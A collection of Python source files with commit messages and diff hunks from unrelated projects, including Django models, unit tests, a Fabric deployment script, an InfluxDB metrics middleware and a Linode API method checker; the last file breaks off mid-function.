        return '<Placemark>' + '<name>' + self.name + ' original geometry</name>' + self.kmlOrigGeomStyle(style_domain) + LookAtKml( self.geometry_orig ) + self.geometry_orig.kml + '</Placemark>'

    def kmlFinalGeom(self, style_domain):
        self.geometry_final.transform(4326)
        return '<Placemark>' + '<name>' + self.name + ' final geometry</name>' + self.kmlFinalGeomStyle(style_domain) + LookAtKml( self.geometry_final ) + self.geometry_final.kml + '</Placemark>'

    def kmlOrigGeomStyle(self, style_domain):
        return '<Style> <LineStyle> <color>ffffffff</color> <width>2</width> </LineStyle> <PolyStyle> <color>80ffffff</color> </PolyStyle></Style>'

    def kmlFinalGeomStyle(self, style_domain):
        return '<Style> <LineStyle> <color>ffffffff</color> <width>2</width> </LineStyle> <PolyStyle> <color>80ff0000</color> </PolyStyle></Style>'

    def kmlFolder(self, style_domain):
        """ Return a kml folder containing the kml for this mpa's final and orginal geometry """
        return '<Document><name>MPAs</name><Folder>' + '<name>' + self.name + '</name>' + self.kmlFinalGeom(style_domain) + self.kmlOrigGeom(style_domain) + '</Folder></Document>'

    def add_to_array(self, array):
        """Adds the MPA to the specified array."""
        self.array = array
        self.save()

    def remove_from_array(self):
        """Sets the MPA's `array` property to None."""
        self.array = None
        self.save()
Python
0.000006
@@ -3725,16 +3725,39 @@ ignation +, blank=True, null=True )%0A%0A o
8d4c7c94dba6708758732d74228e1337bd9f0b83
raise version number
yam/__init__.py
yam/__init__.py
__version__ = '0.2.1'

from yam.main import run
from yam.commands import read_dicts
Python
0.000006
@@ -16,9 +16,13 @@ 0.2. -1 +2-dev '%0A%0Af
ce6a23206271f4e9a0dfd54e7a2663789d5237de
update test
accelerator_abstract/tests/test_startup_progress.py
accelerator_abstract/tests/test_startup_progress.py
from django.test import TestCase

from accelerator.tests.factories import (
    BusinessPropositionFactory,
    StartupFactory
)
from accelerator.models import BusinessProposition
from accelerator_abstract.models.base_startup import (
    APPLICATION_READY,
    PROFILE_COMPLETE,
)
from accelerator_abstract.models import EXCLUDED_FIELDS


class TestStartupProgress(TestCase):
    def _business_proposition_data(self):
        fields = BusinessProposition._meta.get_fields(include_parents=False)
        characters = 'text input characters'
        data = {}
        for field in fields:
            if field.name not in EXCLUDED_FIELDS:
                data[field.name] = characters
        return data

    def test_application_ready_milestone_with_incomplete_data(self):
        startup = StartupFactory()
        BusinessPropositionFactory(startup=startup)
        progress = startup.profile_status()
        self.assertEqual(progress['milestone'], APPLICATION_READY)
        self.assertFalse(progress['bus-prop-complete'])
        self.assertFalse(progress['profile-complete'])
        self.assertGreater(1, progress['progress'])

    def test_business_prop_complete_startup_profile_incomplete(self):
        startup = StartupFactory()
        business_prop_data = self._business_proposition_data()
        BusinessPropositionFactory(startup=startup, **business_prop_data)
        progress = startup.profile_status()
        self.assertEqual(progress['milestone'], APPLICATION_READY)
        self.assertTrue(progress['bus-prop-complete'])
        self.assertFalse(progress['profile-complete'])
        self.assertGreater(1, progress['progress'])

    def test_startup_profile_complete_business_prop_incomplete_(self):
        startup = StartupFactory(video_elevator_pitch_url='https://video.com')
        BusinessPropositionFactory(startup=startup)
        progress = startup.profile_status()
        self.assertEqual(progress['milestone'], APPLICATION_READY)
        self.assertFalse(progress['bus-prop-complete'])
        self.assertTrue(progress['profile-complete'])
        self.assertGreater(1, progress['progress'])

    def test_milestone_change_when_required_field_complete(self):
        business_proposition_data = self._business_proposition_data()
        startup = StartupFactory(video_elevator_pitch_url='https://video.com')
        BusinessPropositionFactory(startup=startup,
                                   **business_proposition_data)
        progress = startup.profile_status()
        self.assertEqual(progress['milestone'], PROFILE_COMPLETE)
        self.assertTrue(progress['bus-prop-complete'])
        self.assertFalse(progress['profile-complete'])
        self.assertGreater(1, progress['progress'])

    def test_business_prop_complete_startup_profile_complete(self):
        business_proposition_data = self._business_proposition_data()
        startup = StartupFactory(video_elevator_pitch_url='https://video.com',
                                 high_resolution_logo='logo.jpg')
        BusinessPropositionFactory(startup=startup,
                                   **business_proposition_data)
        progress = startup.profile_status()
        self.assertEqual(progress['milestone'], PROFILE_COMPLETE)
        self.assertTrue(progress['bus-prop-complete'])
        self.assertTrue(progress['profile-complete'])
        self.assertEqual(1, progress['progress'])
Python
0
@@ -1658,31 +1658,41 @@ ef test_ -startup_profile +profile_application_field _complet @@ -1717,17 +1717,16 @@ complete -_ (self):%0A @@ -1948,33 +1948,32 @@ tone'%5D, -APPLICATION_READY +PROFILE_COMPLETE )%0A @@ -2033,35 +2033,36 @@ self.assert -Tru +Fals e(progress%5B'prof
3ea84302368818133b045d56a0c8c798872eedd1
Add default logger and log exception
influxdb_metrics/middleware.py
influxdb_metrics/middleware.py
"""Middlewares for the influxdb_metrics app.""" from django import VERSION as DJANGO_VERSION import inspect import time try: from urllib import parse except ImportError: import urlparse as parse from django.conf import settings try: from django.utils.deprecation import MiddlewareMixin except ImportError: class MiddlewareMixin(object): pass from tld import get_tld from tld.exceptions import TldBadUrl, TldDomainNotFound, TldIOError from .loader import write_points if DJANGO_VERSION < (1, 10): def is_user_authenticated(user): return user.is_authenticated() else: def is_user_authenticated(user): return user.is_authenticated class InfluxDBRequestMiddleware(MiddlewareMixin): """ Measures request time and sends metric to InfluxDB. Credits go to: https://github.com/andymckay/django-statsd/blob/master/django_statsd/middleware.py#L24 # NOQA """ def process_view(self, request, view_func, view_args, view_kwargs): view = view_func if not inspect.isfunction(view_func): view = view.__class__ try: request._view_module = view.__module__ request._view_name = view.__name__ request._start_time = time.time() except AttributeError: # pragma: no cover pass def process_response(self, request, response): self._record_time(request) return response def process_exception(self, request, exception): self._record_time(request) def _record_time(self, request): if hasattr(request, '_start_time'): ms = int((time.time() - request._start_time) * 1000) if request.is_ajax(): is_ajax = True else: is_ajax = False is_authenticated = False is_staff = False is_superuser = False if is_user_authenticated(request.user): is_authenticated = True if request.user.is_staff: is_staff = True if request.user.is_superuser: is_superuser = True referer = request.META.get('HTTP_REFERER') referer_tld = None referer_tld_string = '' if referer: try: referer_tld = get_tld(referer, as_object=True) except (TldBadUrl, TldDomainNotFound, TldIOError): pass if referer_tld: referer_tld_string = referer_tld.tld url = request.get_full_path() url_query = parse.parse_qs(parse.urlparse(url).query) # This allows you to measure click rates for ad-campaigns, just # make sure that your ads have `?campaign=something` in the URL campaign_keyword = getattr( settings, 'INFLUXDB_METRICS_CAMPAIGN_KEYWORD', 'campaign') campaign = '' if campaign_keyword in url_query: campaign = url_query[campaign_keyword][0] data = [{ 'measurement': 'django_request', 'tags': { 'host': settings.INFLUXDB_TAGS_HOST, 'is_ajax': is_ajax, 'is_authenticated': is_authenticated, 'is_staff': is_staff, 'is_superuser': is_superuser, 'method': request.method, 'module': request._view_module, 'view': request._view_name, 'referer': referer, 'referer_tld': referer_tld_string, 'full_path': url, 'path': request.path, 'campaign': campaign, }, 'fields': {'value': ms, }, }] try: write_points(data) except Exception as err: pass # sadly, when using celery, there can be issues with the connection to the MQ. Better to drop the data # than fail the request.
Python
0
@@ -114,16 +114,31 @@ rt time%0A +import logging%0A try:%0A @@ -690,16 +690,54 @@ icated%0A%0A +logger = logging.getLogger(__name__)%0A%0A %0Aclass I @@ -3992,20 +3992,80 @@ -pass +logger.exception(err, extra=%7B%22request%22: request%7D)%0A # sadl
5aa1ebc3ab10eb2bce9410d4997944a411a4bac4
Make the test case SourceManagerTestCase.display_source_python stronger by also matching the source line number displayed.
test/source-manager/TestSourceManager.py
test/source-manager/TestSourceManager.py
""" Test lldb core component: SourceManager. Test cases: o test_display_source_python: Test display of source using the SBSourceManager API. o test_modify_source_file_while_debugging: Test the caching mechanism of the source manager. """ import unittest2 import lldb from lldbtest import * class SourceManagerTestCase(TestBase): mydir = "source-manager" def setUp(self): # Call super's setUp(). TestBase.setUp(self) # Find the line number to break inside main(). self.line = line_number('main.c', '// Set break point at this line.') @python_api_test def test_display_source_python(self): """Test display of source using the SBSourceManager API.""" self.buildDefault() self.display_source_python() def test_modify_source_file_while_debugging(self): """Modify a source file while debugging the executable.""" self.buildDefault() self.modify_source_file_while_debugging() def display_source_python(self): """Display source using the SBSourceManager API.""" exe = os.path.join(os.getcwd(), "a.out") self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET) target = self.dbg.CreateTarget(exe) self.assertTrue(target.IsValid(), VALID_TARGET) # Launch the process, and do not stop at the entry point. process = target.LaunchProcess([], [], os.ctermid(), 0, False) # # Exercise Python APIs to display source lines. # # Create the filespec for 'main.c'. filespec = lldb.SBFileSpec('main.c', False) source_mgr = self.dbg.GetSourceManager() # Use a string stream as the destination. stream = lldb.SBStream() source_mgr.DisplaySourceLinesWithLineNumbers(filespec, self.line, 2, # context before 2, # context after "=>", # prefix for current line stream) # 2 # 3 int main(int argc, char const *argv[]) { # 4 => printf("Hello world.\n"); // Set break point at this line. # 5 return 0; # 6 } self.expect(stream.GetData(), "Source code displayed correctly", exe=False, patterns = ['=>.*Hello world']) def modify_source_file_while_debugging(self): """Modify a source file while debugging the executable.""" exe = os.path.join(os.getcwd(), "a.out") self.runCmd("file " + exe, CURRENT_EXECUTABLE_SET) self.expect("breakpoint set -f main.c -l %d" % self.line, BREAKPOINT_CREATED, startstr = "Breakpoint created: 1: file ='main.c', line = %d, locations = 1" % self.line) self.runCmd("run", RUN_SUCCEEDED) # The stop reason of the thread should be breakpoint. self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT, substrs = ['state is stopped', 'main.c', 'stop reason = breakpoint']) # Display some source code. self.expect("list -f main.c -l %d" % self.line, SOURCE_DISPLAYED_CORRECTLY, substrs = ['Hello world']) # Read the main.c file content. with open('main.c', 'r') as f: original_content = f.read() print "original content:", original_content # Modify the in-memory copy of the original source code. new_content = original_content.replace('Hello world', 'Hello lldb', 1) # This is the function to restore the original content. def restore_file(): with open('main.c', 'w') as f: f.write(original_content) with open('main.c', 'r') as f: print "content restored to:", f.read() # Modify the source code file. with open('main.c', 'w') as f: f.write(new_content) print "new content:", new_content # Add teardown hook to restore the file to the original content. self.addTearDownHook(restore_file) # Display the source code again. We should see the updated line. 
self.expect("list -f main.c -l %d" % self.line, SOURCE_DISPLAYED_CORRECTLY, substrs = ['Hello lldb']) if __name__ == '__main__': import atexit lldb.SBDebugger.Initialize() atexit.register(lambda: lldb.SBDebugger.Terminate()) unittest2.main()
Python
0.999996
@@ -2469,16 +2469,19 @@ rns = %5B' +%25d =%3E.*Hell @@ -2488,16 +2488,28 @@ o world' + %25 self.line %5D)
71d0f02e1274829a302cdd6f716f2fc0680cce49
Update fab.py
ydcommon/fab.py
ydcommon/fab.py
from fabric.api import local, sudo, run
from fabric.operations import prompt
from fabric.colors import red
from fabric.contrib.console import confirm


def get_branch_name(on_local=True):
    cmd = "git branch --no-color 2> /dev/null | sed -e '/^[^*]/d'"
    if on_local:
        name = local(cmd, capture=True).replace("* ", "")
    else:
        name = run(cmd)
    return name.replace("* ", "").strip()


def switch(stage):
    """
        Switch to given stage (dev/qa/production) + pull
    """
    stage = stage.lower()
    local("git pull")
    if stage in ['dev', 'devel', 'develop']:
        branch_name = 'develop'
    elif stage in ['qa', 'release']:
        branches = local('git branch -r', capture=True)
        possible_branches = []
        for b in branches.split("\n"):
            b_parts = b.split('/')
            if b_parts[1] == 'release':
                possible_branches.append(b_parts[2])
        if len(possible_branches) == 0:
            raise Exception('No release branches found. Please create a new release first.')
        possible_branches = sorted(possible_branches, reverse=True)
        branch_name = 'release/%s' % possible_branches[0]
    elif stage in ['production', 'master']:
        branch_name = 'master'
    else:
        raise NotImplemented
    local("git checkout %s" % branch_name)
    local("git pull")


def release_qa():
    """
        Release code to QA server
    """
    name = prompt(red('Sprint name?'), default='Sprint 1').lower().replace(' ', "_")
    date = prompt(red('Sprint start date (Y-m-d)?'), default='2013-01-20').replace('-', '')
    release_name = '%s_%s' % (date, name)
    local('git flow release start %s' % release_name)
    local('git flow release publish %s' % release_name)
    print red('PLEASE DEPLOY CODE: fab deploy:all')


def update_qa():
    """
        Merge code from develop to qa
    """
    switch('dev')
    switch('qa')
    local('git merge --no-edit develop')
    local('git push')
    print red('PLEASE DEPLOY CODE: fab deploy:all')


def check_branch(environment, user):
    if environment == 'qa':
        local_branch = get_branch_name()
        remote_branch = get_branch_name(False)
        if local_branch != remote_branch:
            change = confirm(red('Branch on server is different, do you want to replace your local branch with server version?'), default=True)
            if change:
                sudo('git checkout %s' % local_branch, user=user)
Python
0
@@ -2302,55 +2302,37 @@ to -replace your +checkout %25s ?' %25 local - +_ branch - with server version?' ), d
95aa4c210c735bd9ac74a65cdbef418d99beb319
Bump to v0.2.0
sii/__init__.py
sii/__init__.py
# -*- coding: utf-8 -*-
__LIBRARY_VERSION__ = '0.1.0alpha'
__SII_VERSION__ = '0.7'
Python
0.000001
@@ -47,16 +47,11 @@ '0. -1 +2 .0 -alpha '%0A__
bf71ea3e0f84d0e8317429e41b45dfe2e157d8a9
fix import
test/unit_test/test_general_functions.py
test/unit_test/test_general_functions.py
from lexos.helpers.general_functions import get_encoding, make_preview_from, \
    generate_d3_object, merge_list, load_stastic, matrix_to_dict, \
    dict_to_matrix, html_escape, apply_function_exclude_tags, decode_bytes
from test.helpers.file_path import CHINESE_ENCODING_TEST_FILE


class TestGeneralFunctions:
    def test_get_encoding(self):
        assert get_encoding(b"asdf") == "ascii"

    def test_make_preview_from(self):
        newline = '\n'
        one_char = "x"
        less_than_500_char = "modgaecq"
        str_250 = "gjzeqagitanbwnuwjkfbtpixhkcxltlcmvrbunoxovjzhyoiptckkxmd" \
                  "brcnshyefsrqexbdeczdbqjvprgiyjwwsacutlahuwhmscyuwkqxfnxq" \
                  "zxyozedtwmrztwzzvoxrjnaypzbrkxfytpqeqmemxylvrvgtsthbalai" \
                  "byzxnoxxbtofhnpdepatvbihjoungenjidckhepgdlsmnrbqdgaalidw" \
                  "gccbardglcnedcqqxduuaauzyv"
        str_500 = str_250 + str_250
        more_than_500_char_even = \
            str_250 + less_than_500_char + less_than_500_char + str_250
        more_than_500_char_odd = \
            str_250 + less_than_500_char + one_char + less_than_500_char + \
            str_250
        middle = '\u2026 ' + newline + newline + '\u2026'
        assert make_preview_from(less_than_500_char) == less_than_500_char
        assert make_preview_from(str_500) == str_500
        assert make_preview_from(
            more_than_500_char_odd) == str_250 + middle + str_250
        assert make_preview_from(
            more_than_500_char_even) == str_250 + middle + str_250

    def test_generate_d3_object(self):
        assert generate_d3_object(
            {'a': 1, 'b': 2, 'c': 3, 'd': 4}, "object", "word", "count") == {
            'name': 'object',
            'children': [{'word': 'a', 'count': 1},
                         {'word': 'b', 'count': 2},
                         {'word': 'c', 'count': 3},
                         {'word': 'd', 'count': 4}]}

    def test_merge_list(self):
        assert merge_list([{"a": 1, "b": 2}, {"c": 3, "d": 4}]) == {
            'a': 1, 'b': 2, 'c': 3, 'd': 4}

    def test_load_stastic(self):
        assert load_stastic(
            "this is a string string") == {
            "this": 1, "is": 1, "a": 1, "string": 2}

    def test_matrix_to_dict(self):
        assert matrix_to_dict([['', 'a', 'b', 'c', 'd'], [0, 1, 2, 3, 4]]) == \
            [{'a': 1, 'b': 2, 'c': 3, 'd': 4}]

    def test_dict_to_matrix(self):
        assert dict_to_matrix(
            [{'a': 1, 'b': 2, 'c': 3, 'd': 4}]) == (
            [['', 'a', 'b', 'c', 'd'], [0, 1, 2, 3, 4]],
            ['a', 'b', 'c', 'd'])


class TestHtmlEscape:
    def test_amp(self):
        assert html_escape('&') == "&amp;"

    def test_quot(self):
        assert html_escape('"') == "&quot;"

    def test_apos(self):
        assert html_escape("'") == "&apos;"

    def test_gt(self):
        assert html_escape('>') == "&gt;"

    def test_lt(self):
        assert html_escape('<') == "&lt;"

    def test_all(self):
        assert html_escape('&"\'><') == '&amp;&quot;&apos;&gt;&lt;'
        assert html_escape("<html lang='en'></html>") == '&lt;html lang=&apo' \
                                                         's;en&apos;&gt;&lt;' \
                                                         '/html&gt;'
        assert html_escape('<html lang="en"></html>') == '&lt;html lang=&quo' \
                                                         't;en&quot;&gt;&lt;' \
                                                         '/html&gt;'


class TestApplyFunctionExcludeTags:
    def dummy_function(self, input_string):
        return input_string + input_string

    def test_one_function(self):
        input_str = "<tag>asdf</tag>"
        assert apply_function_exclude_tags(
            input_str, [self.dummy_function]) == '<tag>asdfasdf</tag>'
        assert apply_function_exclude_tags(
            input_str, [str.upper]) == '<tag>ASDF</tag>'

    def test_two_functions(self):
        input_str = "<tag>asdf</tag>"
        assert apply_function_exclude_tags(
            input_str, [str.upper, self.dummy_function]) == '<tag>' \
                                                            'ASDFASDF' \
                                                            '</tag>'

    def test_multiple_functions(self):
        assert apply_function_exclude_tags(
            '<tag>asdf</tag>',
            [str.upper, str.lower, self.dummy_function]) == '<tag>asdfasdf</tag>'

    def test_empty_string(self):
        input_str = ""
        assert apply_function_exclude_tags(
            input_str, [self.dummy_function]) == ''
        assert apply_function_exclude_tags(
            input_str, [str.upper]) == ''

    def test_tags_only(self):
        input_str = "<tag></tag>"
        assert apply_function_exclude_tags(
            input_str, [self.dummy_function]) == '<tag></tag>'
        assert apply_function_exclude_tags(
            input_str, [str.upper]) == '<tag></tag>'


class TestDecodeBytes:
    def test_gb2312_decoding(self):
        assert decode_bytes(u'做戏之说做戏之'.encode('gb2312')) == '做戏之说做戏之'

    def test_utf16_decoding(self):
        assert decode_bytes(u'абвгдежзийкл'.encode('utf-16')) == 'абвгдежзийкл'

    def test_utf8_decoding(self):
        assert decode_bytes(u'España'.encode('utf-8')) == 'España'

    def test_iso8859_1_decoding(self):
        assert decode_bytes('Äpple'.encode('iso-8859-1')) == 'Äpple'

    def test_windows_1251_decoding(self):
        input_str = 'сегодняшнее домашнее задание.' \
                    ' Настенные часы висят на стене. '
        assert decode_bytes(input_str.encode('windows-1251')) == input_str
Python
0.000001
@@ -219,70 +219,8 @@ tes%0A -from test.helpers.file_path import CHINESE_ENCODING_TEST_FILE%0A %0A%0Acl
c273fa5ba0ae43cc5979f1076349edf737a67710
Add reserved words to custom data field validation
corehq/apps/custom_data_fields/models.py
corehq/apps/custom_data_fields/models.py
from dimagi.ext.couchdbkit import (Document, StringProperty, BooleanProperty,
                                   SchemaListProperty, StringListProperty)
from dimagi.ext.jsonobject import JsonObject
from django.core.exceptions import ValidationError
from django.utils.translation import ugettext as _
from .dbaccessors import *


CUSTOM_DATA_FIELD_PREFIX = "data-field"
# This list is used to grandfather in existing data, any new fields should use
# the system prefix defined below
SYSTEM_FIELDS = ["commtrack-supply-point"]
SYSTEM_PREFIX = "commcare"


def _validate_reserved_words(slug):
    if slug in SYSTEM_FIELDS:
        return _('You may not use "{}" as a field name').format(slug)
    for prefix in [SYSTEM_PREFIX, 'xml']:
        if slug and slug.startswith(prefix):
            return _('Field names may not begin with "{}"').format(prefix)


def is_system_key(slug):
    return bool(_validate_reserved_words(slug))


def validate_reserved_words(slug):
    error = _validate_reserved_words(slug)
    if error is not None:
        raise ValidationError(error)


class CustomDataField(JsonObject):
    slug = StringProperty()
    is_required = BooleanProperty()
    label = StringProperty()
    choices = StringListProperty()
    is_multiple_choice = BooleanProperty(default=False)


class CustomDataFieldsDefinition(Document):
    """
    Per-project user-defined fields such as custom user data.
    """
    field_type = StringProperty()
    base_doc = "CustomDataFieldsDefinition"
    domain = StringProperty()
    fields = SchemaListProperty(CustomDataField)

    def get_fields(self, required_only=False):
        def _is_match(field):
            if required_only and not field.is_required:
                return False
            return True
        return filter(_is_match, self.fields)

    @classmethod
    def get_or_create(cls, domain, field_type):
        # todo: this overrides get_or_create from DocumentBase but with a completely different signature.
        # This method should probably be renamed.
        existing = get_by_domain_and_type(domain, field_type)

        if existing:
            return existing
        else:
            new = cls(domain=domain, field_type=field_type)
            new.save()
            return new

    # TODO use this in the CustomDataEditor too?
    def get_validator(self, data_field_class):
        """
        Returns a validator to be used in bulk import
        """
        def validate_choices(field, value):
            if field.choices and value and unicode(value) not in field.choices:
                return _(
                    "'{value}' is not a valid choice for {slug}, the available "
                    "options are: {options}."
                ).format(
                    value=value,
                    slug=field.slug,
                    options=', '.join(field.choices),
                )

        def validate_required(field, value):
            if field.is_required and not value:
                return _(
                    "Cannot create or update a {entity} without "
                    "the required field: {field}."
                ).format(
                    entity=data_field_class.entity_string,
                    field=field.slug
                )

        def validate_custom_fields(custom_fields):
            errors = []
            for field in self.fields:
                value = custom_fields.get(field.slug, None)
                errors.append(validate_required(field, value))
                errors.append(validate_choices(field, value))
            return ' '.join(filter(None, errors))

        return validate_custom_fields

    def get_model_and_uncategorized(self, data_dict):
        """
        Splits data_dict into two dictionaries:
        one for data which matches the model and one for data that doesn't
        """
        if not data_dict:
            return {}, {}
        model_data = {}
        uncategorized_data = {}
        slugs = [field.slug for field in self.fields]
        for k, v in data_dict.items():
            if k in slugs:
                model_data[k] = v
            else:
                uncategorized_data[k] = v

        return model_data, uncategorized_data
Python
0
@@ -461,17 +461,17 @@ IELDS = -%5B +( %22commtra @@ -486,17 +486,18 @@ y-point%22 -%5D +,) %0ASYSTEM_ @@ -516,16 +516,91 @@ mmcare%22%0A +RESERVED_WORDS = ('name', 'type', 'owner_id', 'external_id', 'hq_user_id')%0A %0A%0Adef _v @@ -622,24 +622,45 @@ d_words(slug +, words=SYSTEM_FIELDS ):%0A if sl @@ -665,29 +665,21 @@ slug in -SYSTEM_FIELDS +words :%0A @@ -1053,24 +1053,56 @@ d_words(slug +, SYSTEM_FIELDS + RESERVED_WORDS )%0A if err
510e04dfd68eeca2e940487eeca9e7474e7f2383
Fix methodcheck.py for the new API documentation style (split into subsections)
linode/methodcheck.py
linode/methodcheck.py
#!/usr/bin/python
"""
A quick script to verify that api.py is in sync with Linode's published
list of methods.

Copyright (c) 2010 Josh Wright <[email protected]>
Copyright (c) 2009 Ryan Tucker <[email protected]>

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""

# URL of API documentation
apidocurl = 'http://www.linode.com/api/autodoc.cfm'

import api
import re
import urllib

tmpfile, httpheaders = urllib.urlretrieve(apidocurl)
tmpfd = open(tmpfile)

local_methods = api.Api.valid_commands()
remote_methods = []

# Read in the list of methods Linode has
rg = re.compile('.*?\\?method=((?:[a-z][a-z\\.\\d\\-]+)\\.(?:[a-z][a-z\\-]+))(?![\\w\\.])')

for i in tmpfd.readlines():
    m = rg.search(i)
    if m:
        remote_methods.append(m.group(1).replace('.','_'))

# Cross-check!
for i in local_methods:
    if i not in remote_methods:
        print('REMOTE Missing: ' + i)
for i in remote_methods:
    if i not in local_methods:
        print('LOCAL Missing: ' + i)
Python
0
@@ -1243,452 +1243,881 @@ %22%0A%0A# - URL of API documentation%0Aapidocurl = 'http://www.linode.com/api/autodoc.cfm'%0A%0Aimport api%0Aimport re%0Aimport urllib%0A%0Atmpfile, httpheaders = urllib.urlretrieve(apidocurl)%0Atmpfd = open(tmpfile)%0A%0Alocal_methods = api.Api.valid_commands()%0Aremote_methods = %5B%5D%0A%0A# Read in the list of methods Linode has%0Arg = re.compile('.*?%5C%5C?method=((?:%5Ba-z%5D%5Ba-z%5C%5C.%5C%5Cd%5C%5C-%5D+)%5C%5C.(?:%5Ba-z%5D%5Ba-z%5C%5C-%5D+))(?!%5B%5C%5Cw%5C%5C.%5D)')%0A%0Afor i in tmpfd.readlines():%0A m = rg.search(i)%0A +The list of subsections found in the API documentation. This should%0A#probably be discovered automatically in the future%0Aapi_subsections = ('linode', 'nodebalancer', 'stackscript', 'dns', 'utility')%0A%0Aimport api%0Aimport re%0Aimport itertools%0Afrom HTMLParser import HTMLParser%0Afrom urllib import unquote%0Afrom urllib2 import urlopen%0A%0Aclass SubsectionParser(HTMLParser):%0A base_url = 'http://www.linode.com/api/'%0A%0A def __init__(self, subsection):%0A HTMLParser.__init__(self)%0A self.subsection_re = re.compile('/api/%25s/(.*)$' %25 subsection)%0A self.methods = %5B%5D%0A url = self.base_url + subsection%0A req = urlopen(url)%0A self.feed(req.read())%0A%0A def handle_starttag(self, tag, attrs):%0A if tag == 'a' and attrs:%0A attr_dict = dict(attrs)%0A match = self.subsection_re.match(attr_dict.get('href', ''))%0A if m :%0A @@ -2112,16 +2112,20 @@ if m +atch :%0A @@ -2126,23 +2126,29 @@ -remote_ + self. methods. @@ -2154,17 +2154,29 @@ .append( -m +unquote(match .group(1 @@ -2176,16 +2176,17 @@ group(1) +) .replace @@ -2197,16 +2197,172 @@ ,'_'))%0A%0A +local_methods = api.Api.valid_commands()%0Aremote_methods = list(itertools.chain(*%5BSubsectionParser(subsection).methods for subsection in api_subsections%5D))%0A%0A # Cross-
e0521c1f9a12819fd89f12aed01c623628dc4c4d
Build options added.
intexration/propertyhandler.py
intexration/propertyhandler.py
import configparser
import os


class Build:
    def __init__(self, name, idx, bib):
        self._name = name
        self._idx = idx
        self._bib = bib

    def get_name(self):
        return self._name

    def get_idx(self):
        return self._idx

    def get_bib(self):
        return self._bib

    def get_tex(self):
        return self._name + '.tex'

    def get_pdf(self):
        return self._name + '.pdf'

    def get_log(self):
        return self._name + '.log'


class PropertyHandler:
    def __init__(self, path):
        self._path = path

    def get_builds(self):
        builds = []
        if os.path.exists(self._path):
            parser = configparser.ConfigParser()
            parser.read(self._path)
            for build_name in parser.sections():
                idx = build_name + '.idx'
                bib = build_name
                builds.append(Build(build_name, idx, bib))
        return builds
Python
0
@@ -800,33 +800,303 @@ i -dx = build_name + '.idx'%0A +f parser.has_option(build_name, 'idx'):%0A idx = parser%5Bbuild_name%5D%5B'idx'%5D%0A else:%0A idx = build_name + '.idx'%0A if parser.has_option(build_name, 'bib'):%0A bib = parser%5Bbuild_name%5D%5B'bib'%5D%0A else:%0A @@ -1183,16 +1183,16 @@ , bib))%0A + @@ -1204,10 +1204,8 @@ n builds -%0A%0A
3a3fe2687fb65a99a799e9cb3c63f00223f4b92b
Update models.py
simit/models.py
simit/models.py
from django.db import models
from django.utils.translation import ugettext as _
from mptt.fields import TreeForeignKey
from mptt.models import MPTTModel
from simit.helper import load_url_pattern_names
from tinymce.models import HTMLField
from django.conf import settings
from django.utils.functional import lazy
from django.core.urlresolvers import reverse

CUSTOM_TYPES = [
    (1, "TEXT"),
    (2, "DATE"),
    (3, "NUMBER"),
    (4, "RICH_TEXT"),
    (5, "BOOLEAN"),
    (6, "CHOICES"),
    (7, "FILE"),
    (8, "IMAGE"),
    (9, "COLOR"),
]


def get_urlconf():
    try:
        if not hasattr(settings, "SIMIT_MENU_URLPATTERNS_MODULE"):
            return list(__import__(settings.ROOT_URLCONF).urls.urlpatterns)
        else:
            return list(__import__(settings.SIMIT_MENU_URLPATTERNS_MODULE).urls.urlpatterns)
    except Exception:
        return []


def dictfetchall(cursor):
    desc = cursor.description
    return [
        dict(zip([col[0] for col in desc], row))
        for row in cursor.fetchall()
    ]


class CustomAreaCategory(models.Model):
    name = models.CharField(_('name'), max_length=50, unique=True, db_index=True)

    def __unicode__(self):
        return self.name

    class Meta:
        verbose_name = _('custom area category')
        verbose_name_plural = _('custom area categories')


class CustomArea(models.Model):
    name = models.CharField(_('name'), max_length=100)
    slug = models.CharField(_('slug'), max_length=100, unique=True)
    value = models.TextField(_('value'), )
    type = models.IntegerField(_('type'), choices=CUSTOM_TYPES)
    category = models.ForeignKey("simit.CustomAreaCategory")
    extra = models.TextField(_('extra data'), blank=True)
    description = models.CharField(_('description'), max_length=250, blank=True)

    def __unicode__(self):
        return self.name

    class Meta:
        verbose_name_plural = _("custom areas")
        verbose_name = _("custom area")


class Page(models.Model):
    name = models.CharField(_('name'), max_length=255)
    content = HTMLField(_('content'), )
    slug = models.SlugField(_('slug'), )
    tags = models.CharField(_('tags'), max_length=255, blank=True)
    description = models.TextField(_('description'), blank=True)
    title = models.CharField(_('title'), max_length=255, blank=True)
    last_modified = models.DateTimeField(_('last modified'), auto_now=True)
    is_active = models.BooleanField(default=True)

    class Meta:
        verbose_name_plural = _("pages")
        verbose_name = _("page")

    def __unicode__(self):
        return self.name

    def get_absolute_url(self):
        url_conf = getattr(settings, 'SIMIT_PAGE_URL_NAME')
        if url_conf:
            return reverse(url_conf, args=(self.slug))
        else:
            return '/page/%s' % self.slug


class MenuSection(models.Model):
    name = models.CharField(_('name'), max_length=255)

    class Meta:
        verbose_name_plural = _("menu sections")
        verbose_name = _("menu section")

    def __unicode__(self):
        return self.name


class Menu(MPTTModel):
    title = models.CharField(_('title'), max_length=255)
    parent = TreeForeignKey('self', null=True, blank=True, related_name='children', verbose_name=_('parent menu'))
    description = models.TextField(_('description'), blank=True)
    url = models.CharField(_('url'), max_length=255, blank=True, null=True)
    page = models.ForeignKey("simit.Page", blank=True, null=True)
    url_name = models.CharField(_('url pattern'), max_length=255, blank=True, null=True,
                                choices=[(name, name) for name in load_url_pattern_names(
                                    lazy(get_urlconf, list)(), include_with_args=False)])
    section = models.ForeignKey("simit.MenuSection")
    is_active = models.BooleanField(default=True)

    def __unicode__(self):
        return self.title

    def get_url(self):
        if self.page is not None:
